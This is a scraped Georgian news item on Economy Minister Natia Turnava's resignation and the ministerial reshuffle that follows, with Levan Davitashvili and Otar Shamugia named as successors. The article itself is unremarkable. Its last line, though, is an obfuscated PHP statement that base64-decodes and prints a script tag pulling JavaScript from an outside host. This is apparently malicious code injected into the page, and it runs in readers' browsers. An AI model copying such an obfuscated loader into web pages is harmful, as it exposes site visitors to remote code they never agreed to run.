celsiusi
ავერსი საქკაბელი
ეკონომიკის მინისტრი ნათია თურნავა თანამდებობას ტოვებს. როგორც ნათია თურნავამ ბრიფინგზე განაცხადა, მას აქვს სურვილი, შეიცვალოს სფერო, სხვა ასპარეზზე მოსინჯოს ძალები, თუმცა არ დაუზუსტებია, სად გააგრძელებს საქმიანობას.
 
„მაქვს სურვილი, შევიცვალო სფერო, სხვა ასპარეზზე მოსვინჯო ძალები. ვრჩები ჩემი გუნდის ერთგულ წევრად. ვიხილავთ რამდენიმე მიმართულებას, კონკრეტიკა არ არის“, – განუცხადა მან ჟურნალისტებს.
 
ეკონომიკისა და მდგრადი განვითარების მინისტრის პოსტზე მას ჩაანაცვლებს ლევან დავითაშვილი, სოფლის მეურნეობის მოქმედი მინისტრი.
 
დავითაშვილს, გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის პოსტზე, მისი მოადგილე, ოთარ შამუგია ჩაანაცვლებს.
 
სამთავრობო ცვლილებებზე ინფორმაცია, რომელიც მედიაში ბოლო დღეების განმავლობაში არაოფიციალურად, სხვადასხვა ვარიაციით ვრცელდებოდა, 9 თებერვალს, 14:00 საათზე, სპეციალურ ბრიფინგზე დაადასტურა პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა.
 
ნათია თურნავა 2019 წლის აპრილში დაინიშნა ეკონომიკის მინისტრად, მანამდე იგი მინისტრ გიორგი ქობულიას მოადგილე იყო.
 
ლევან დავითაშვილი კი 2016 წლიდან იყო ამ პოსტზე. მანამდე, 2 წლის განმავლობაში ისიც მინისტრის მოადგილე იყო.
 
862
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");